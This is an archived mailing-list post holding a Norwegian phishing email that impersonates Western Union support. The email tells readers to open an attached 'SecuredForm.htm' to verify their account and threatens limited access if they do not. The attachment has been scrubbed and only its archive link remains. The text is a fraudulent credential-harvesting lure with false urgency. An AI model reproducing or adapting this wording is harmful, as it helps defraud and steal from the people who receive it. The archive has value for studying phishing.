[Peerpress-xml] Sikkerhet Varsling !

Western Union support at wufly.com
Fri Nov 23 15:20:23 CET 2012


Du må oppdatere dine kontoopplysninger for fremtidig arbeid med våre tjenester.

Fra tid til annen er nødvendig for å verifisere kontoen din for sikkerhet.

Vi har lagt til denne e verifikasjon form. Last ned og åpne vedlagte skjema, fyll valideringen form.

Vær oppmerksom på at dette er en engangs oppgave som vil ta bare 3-5 minutter av din dyrebare tid. 
Imidlertid vil svikt i å oppdatere profilen din resultere i å begrense din tilgang til kontoen. 
Vi beklager eventuelle ulemper dette medfører.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: SecuredForm.htm
Type: {"application/octet-stream"}
Size: 3510 bytes
Desc: not available
URL: <http://lists.copyleft.no/pipermail/peerpress-xml/attachments/20121123/3cd0b966/attachment.bin>


More information about the Peerpress-xml mailing list